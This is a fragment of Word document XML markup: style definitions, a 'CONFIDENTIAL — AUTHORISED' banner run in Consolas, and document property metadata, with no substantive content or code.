    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FF2D55"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> CONFIDENTIAL — AUTHORISED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C8D8F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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF6B35"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="320" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF8C4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2026-02-26T11:49:04.516Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-26T11:49:04.518Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>